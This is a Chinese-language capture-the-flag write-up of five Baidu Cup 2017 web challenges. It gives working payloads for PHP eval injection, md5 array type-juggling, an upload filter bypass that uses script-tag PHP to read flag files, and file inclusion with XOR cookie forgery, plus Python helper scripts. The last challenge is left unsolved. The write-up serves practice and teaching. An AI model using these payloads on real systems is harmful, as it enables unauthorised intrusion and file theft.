“百度杯”CTF比赛 2017 二月场_爆破-1
题目内容:flag就在某六位变量中。
- 打开页面给出了源代码:
<?php
include "flag.php";
$a = @$_REQUEST['hello'];
if(!preg_match('/^\w*$/',$a )){
die('ERROR');
}
eval("var_dump($$a);");
show_source(__FILE__);
?>
- 看到了$$a,可能是用超全局变量GLOBALS,于是post或者get一个参数hello=GLOBALS,果然:
array(9) { ["_GET"]=> array(0) { } ["_POST"]=> array(1) { ["hello"]=> string(7) "GLOBALS" } ["_COOKIE"]=> array(12) { ["UM_distinctid"]=> string(60) "16043bd3caaeb9-0b92da86f81d64-572f7b6e-144000-16043bd3cabcbb" ["pgv_pvi"]=> string(10) "4712199168" ["Hm_lvt_2d0601bd28de7d49818249cf35d95943"]=> string(43) "1517321365,1517561003,1517806905,1518241521" ["Hm_lvt_1a32f7c660491887db0960e9c314b022"]=> string(21) "1517716104,1518241572" ["Hm_lvt_9104989ce242a8e03049eaceca950328"]=> string(21) "1517716103,1518241572" ["browse"]=> string(428) "CFlRTxUYU0BcVVhAVQJTRFBZSkdeQF5YWFFFR19RW0VTUV9PXURLTgBZXUFZQlxOGllZTFRTW0VYW0VFX1xZQUlRWU9eRlNBX0FTHFREX01ZVFMGVEBQT0tRWERWXFlERFNcVV9IU0dRWVtNTEoAT1xVUURfShpPWFpSV1xBWE1EU1lYXkVJR1lZWkVUQVtXUgpSQFhIWkxSEFJEV0tLR1lSUFheQERFXUNaRVRDWU9YU0pOB0tcQ1laW04dS1hMU0FaRV9JREVYTlhBTkNZT1tUUkBbU1IcU1ZQQldIUgZTUlFPTENZRFFOWERDQV1VW1JSRFhLW0BLWAFPW0JQRlxYG09fSFNXW1NZTUNBWFhZV0hHX0tYQ1NWXFdVGFNAX1BdQFUCU0RQWUpHXkBRWFlSRUZfUVtHU1JRT19DS04U" ["chkphone"]=> string(33) "acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O" ["ci_session"]=> string(40) "83424777bfb234df7faa495fd1d754b785933fa1" ["pgv_si"]=> string(11) "s4974850048" ["Hm_lpvt_2d0601bd28de7d49818249cf35d95943"]=> string(10) "1518241600" ["Hm_lpvt_9104989ce242a8e03049eaceca950328"]=> string(10) "1518241572" ["Hm_lpvt_1a32f7c660491887db0960e9c314b022"]=> string(10) "1518241572" } ["_FILES"]=> array(0) { } ["_REQUEST"]=> array(1) { ["hello"]=> string(7) "GLOBALS" } ["flag"]=> string(38) "flag在一个长度为6的变量里面" ["d3f0f8"]=> string(42) "flag{bbb87d3a-f564-43c4-a341-0a2ed11dbda8}" ["a"]=> string(7) "GLOBALS" ["GLOBALS"]=> *RECURSION* } <?php
include "flag.php";
$a = @$_REQUEST['hello'];
if(!preg_match('/^\w*$/',$a )){
die('ERROR');
}
eval("var_dump($$a);");
show_source(__FILE__);
?>
- flag{bbb87d3a-f564-43c4-a341-0a2ed11dbda8}
“百度杯”CTF比赛 2017 二月场_爆破-2
题目内容:flag不在变量中。
- post/get参数可以传入函数或者命令
- payload:
1.?hello=file('flag.php')
2.?hello=file_get_contents('flag.php')(这个payload经过测试出不来flag)
array(3) { [0]=> string(6) " string(32) "$flag = 'Too Young Too Simple'; " [2]=> string(45) "#flag{4408aece-a177-4821-bf96-21d6593802f8}; " } <?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
- flag{4408aece-a177-4821-bf96-21d6593802f8}
“百度杯”CTF比赛 2017 二月场_爆破-3
题目内容:这个真的是爆破。
<?php
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
$_SESSION['nums'] = 0;
$_SESSION['time'] = time();
$_SESSION['whoami'] = 'ea';
}
if($_SESSION['time']+120<time()){ ##时间限时两分钟
session_destroy();
}
$value = $_REQUEST['value'];
$str_rand = range('a', 'z');
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)]; ##随机选一个字母
if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
$_SESSION['nums']++;
$_SESSION['whoami'] = $str_rands;
echo $str_rands;
}
if($_SESSION['nums']>=10){
echo $flag;
}
show_source(__FILE__);
?>
- 关键代码:
if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
##substr(md5($value),5,4)第五个字符开始取四个字符,是否==0
$_SESSION['nums']++;
$_SESSION['whoami'] = $str_rands;
echo $str_rands;
}
-
这里md5()一个array可以绕过==判断,md5()一个array返回null,null==0成立:
构造payload:
1.?value[]=ea
返回两个字符,如hv,此时$_SESSION['nums']=1
2.?value[]=hv
此时$_SESSION['nums']=2
...
10.?value[0]=**
此时$_SESSION['nums']=10,echo $flag
owflag{30f4d30c-6db0-4029-919f-7519d8060251} <?php
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
$_SESSION['nums'] = 0;
$_SESSION['time'] = time();
$_SESSION['whoami'] = 'ea';
}
if($_SESSION['time']+120<time()){
session_destroy();
}
$value = $_REQUEST['value'];
$str_rand = range('a', 'z');
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];
if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
$_SESSION['nums']++;
$_SESSION['whoami'] = $str_rands;
echo $str_rands;
}
if($_SESSION['nums']>=10){
echo $flag;
}
show_source(__FILE__);
?>
- 后记:用python脚本
import requests
url='http://10ff0cf83b464bc2957f8deb00ae24f12774ecc5dbcd4331.game.ichunqiu.com/'
session=requests.Session()
html=session.get(url+'?value[]=ea').text #注意:如果value[]=ea的话,value[0]=ea,value[1]为空,那么$value[0].$value[1]=$value[0]=ea
for i in range(10):
html=session.get(url+'?value[]='+html[0:2]).text
if 'flag{.*}' in html:
break
print (html)
-
array数组的结构与定义:
- flag{30f4d30c-6db0-4029-919f-7519d8060251}
“百度杯”CTF比赛 九月场_Upload
题目内容:想怎么传就怎么传,就是这么任性。
tips:flag在flag.php中
- 可以上传任意文件,并且上传之后可以打开文件,想到上传一段php代码来打开flag.php页面:
<?php
$fh=fopen('../flag.php','r');
echo fread($fh,filesize("../flag.php"));
fclose($fh);
?>
- 打开上传的文件发现<?和php被过滤了:
$fh=fopen('../flag.','r'); echo fread($fh,filesize("../flag.")); fclose($fh); ?> - 想着用大写绕过php:
<?php
$fh=fopen('../flag.php','r');
echo fread($fh,filesize("../flag.php"));
fclose($fh);
?>
- 结果返回:
PHP$fh=fopen('../flag.PHP','r'); echo fread($fh,filesize("../flag.PHP")); fclose($fh); ?> - 于是用<script language="PHP">绕过过滤的<?,用函数strtolower("PHP")过滤的php:
<script language="PHP">
$fh=fopen("../flag.".strtolower("PHP"),'r');
echo fread($fh,filesize("../flag.".strtolower("PHP"))); #点号.是连接符,开始还用+号来连接,搞错了。
fclose($fh);
</script>
- 查看源码:
echo 'here_is_flag';
'flag{36815007-b8e3-448c-9f9d-ac712756ce87}';
- flag{36815007-b8e3-448c-9f9d-ac712756ce87}
百度杯”CTF比赛 九月场_Code
题目内容:考脑洞,你能过么?
- 打开是一张图片:http://927e0dde93264ca9bf59cdf7ac271e15fac7a9ab1b9f4074.game.ichunqiu.com/index.php?jpg=hei.jpg
- 看url发现可能是文件包含,尝试查看index.php:http://927e0dde93264ca9bf59cdf7ac271e15fac7a9ab1b9f4074.game.ichunqiu.com/index.php?jpg=index.php
- 查看源码得到base64加密的code,解密得到index.php源码:
<?php
/**
* Created by PhpStorm.
* Date: 2015/11/16
* Time: 1:31
*/
header('content-type:text/html;charset=utf-8');
if(! isset($_GET['jpg']))
header('Refresh:0;url=./index.php?jpg=hei.jpg');
$file = $_GET['jpg'];
echo '<title>file:'.$file.'</title>';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file); ##在正则表达式中,/顺斜杠是表示表达式的开始和结束的“定界符”。\反斜杠是表示转义字符。^放在[]来表示排除不满足该集合的字符.
$file = str_replace("config","_", $file);
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64,".$txt."'></img>";
/*
* Can you find the flag file?
*
*/
?>
-
PhpStorm 新建项目会生成.idea文件夹:
- 在.idea/workspace.xml发现有个页面:"file://$PROJECT_DIR$/fl3g_ichuqiu.php",尝试用文件包含漏洞来读取fl3g_ichuqiu.php的源码,用fl3gconfigichuqiu.php来绕过过滤:
http://927e0dde93264ca9bf59cdf7ac271e15fac7a9ab1b9f4074.game.ichunqiu.com/index.php?jpg=fl3gconfigichuqiu.php
- decodebase64得到源码:
<?php
/**
* Created by PhpStorm.
* Date: 2015/11/16
* Time: 1:31
*/
error_reporting(E_ALL || ~E_NOTICE);
include('config.php');
#随机返回$length个字符
function random($length, $chars = ' ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz') {
$hash = '';
$max = strlen($chars) - 1;
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
}
return $hash;
}
#加密
function encrypt($txt,$key){
for($i=0;$i<strlen($txt);$i++){
$tmp .= chr(ord($txt[$i])+10);
}
$txt = $tmp; #返回每个字符的ascii+10对应的字符
$rnd=random(4); #随机返回4个字符
$key=md5($rnd.$key); #随机四个字符和key拼接,返回md5值
$s=0;
for($i=0;$i<strlen($txt);$i++){
if($s == 32) $s = 0;
$ttmp .= $txt[$i] ^ $key[++$s]; #$txt每个字符与$key的字符按位异或,"^" 按位异或运算
}
return base64_encode($rnd.$ttmp); #随机4个字符拼接$ttmp,再base64
}
#解密
function decrypt($txt,$key){
$txt=base64_decode($txt); #base64decode
$rnd = substr($txt,0,4); #取$txt前四个字符
$txt = substr($txt,4); #取$txt第五个字符开始,剩下全部字符
$key=md5($rnd.$key); #前四个字符和key拼接,返回md5
$s=0;
for($i=0;$i<strlen($txt);$i++){
if($s == 32) $s = 0;
$tmp .= $txt[$i]^$key[++$s];
}
for($i=0;$i<strlen($tmp);$i++){
$tmp1 .= chr(ord($tmp[$i])-10);
}
return $tmp1;
}
$username = decrypt($_COOKIE['user'],$key);
if ($username == 'system'){
echo $flag;
}else{
setcookie('user',encrypt('guest',$key));
echo "â�®(â�¯â�½â�°)â�";
}
?>
- 这是一个加密解密的函数,要求页面http://927e0dde93264ca9bf59cdf7ac271e15fac7a9ab1b9f4074.game.ichunqiu.com/fl3gconfigichuqiu.php的$_COOKIE['user']==对'system'加密后的字符,写了一个python脚本来'system'加密:
import base64
base64encode=str(base64.b64decode('WkVjbkBJWxtM'),"utf-8")
rnd=base64encode[0:4]
ttmp=base64encode[4:]
guest=list('guest')
key=list('123456')
for i in range(len(guest)):
guest[i]=chr(ord(guest[i])+10)
for i in range(len(guest)):
key[i]=chr(ord(guest[i])^ord(ttmp[i])) #得到了key的前五位,因为'guest'有五位字符
#加密
user=list('system')
for i in range(len(user)):
user[i]=chr(ord(user[i])+10)
char='0123456789abcdef'#一般128位的MD5散列被表示为32位十六进制数字。所以这些字符取值范围仅限于0-9和a-f。
for i in range(len(char)):
key[5]=char[i]
ttmp_1=''
for j in range(len(user)):
ttmp_1+=chr(ord(user[j])^ord(key[j]))
new=bytes(rnd+ttmp_1,"utf-8")
print(str(base64.b64encode(new),"utf-8"))
-
然后用Burpsuite来爆破key的最后一位,按道理应该是这样,但是用bp就是出不来flag
